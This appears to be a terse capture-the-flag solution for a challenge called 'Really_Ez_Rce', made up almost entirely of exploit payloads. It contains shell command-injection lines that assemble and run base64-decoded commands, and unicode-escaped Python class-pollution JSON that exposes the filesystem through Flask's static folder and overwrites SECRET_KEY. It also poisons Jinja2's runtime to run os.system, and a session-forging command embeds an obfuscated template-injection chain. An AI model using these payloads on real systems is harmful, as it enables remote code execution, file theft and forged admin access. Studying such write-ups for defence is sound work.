Really_Ez_Rce
echo -n bas >>/tmp/bas
cmd=echo -n e64 >>/tmp/bas
cmd=echo ZmxhZy50eHQ=|dd if=/tmp/bas>
cmd=echo bHM=|dd if=/tmp/bas -d >aa
cmd=echo dGFjIC9mKg==|dd if=/tmp/bas -d >aa
1
2
3
| {
"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f":{"\u0061\u0070\u0070":{"\u005f\u0073\u0074\u0061\u0074\u0069\u0063\u005f\u0066\u006f\u006c\u0064\u0065\u0072":"\u002f"}}
}
|
1
2
3
4
5
6
7
8
9
10
|
{
"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f" : {
"\u0061\u0070\u0070" : {
"\u0063\u006f\u006e\u0066\u0069\u0067" : {
"\u0053\u0045\u0043\u0052\u0045\u0054\u005f\u004b\u0045\u0059" :"abc"
}
}
}
}
|
1
| python flask_session_cookie_manager3.py encode -s "abc" -t "{'name': 'admin', 'permission': '{{()|attr(request.args.x1)|attr(request.args.x2)|attr(request.args.x3)()|attr(request.args.x4)(133)|attr(request.args.x5)|attr(request.args.x6)|attr(request.args.x4)(request.args.x7)|attr(request.args.x4)(request.args.x8)(request.args.x9)}}'}"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| {
"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f": {
"\u005f\u005f\u006c\u006f\u0061\u0064\u0065\u0072\u005f\u005f": {
"\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f": {
"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f": {
"\u0073\u0079\u0073":{
"\u006d\u006f\u0064\u0075\u006c\u0065\u0073":{
"\u006a\u0069\u006e\u006a\u0061\u0032":{
"\u0072\u0075\u006e\u0074\u0069\u006d\u0065":{
"\u0065\u0078\u0070\u006f\u0072\u0074\u0065\u0064":[
"\u002a\u003b\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0066\u0069\u006e\u0064\u0020\u002f\u0020\u002d\u006e\u0061\u006d\u0065\u0020\u0022\u0066\u006c\u0061\u0067\u002a\u0022\u003e\u002f\u0074\u006d\u0070\u002f\u0061\u0027\u0029\u003b\u0023"]
}
}}}
}
}
}
}
,"zhrgf62dtqo":"="}
|
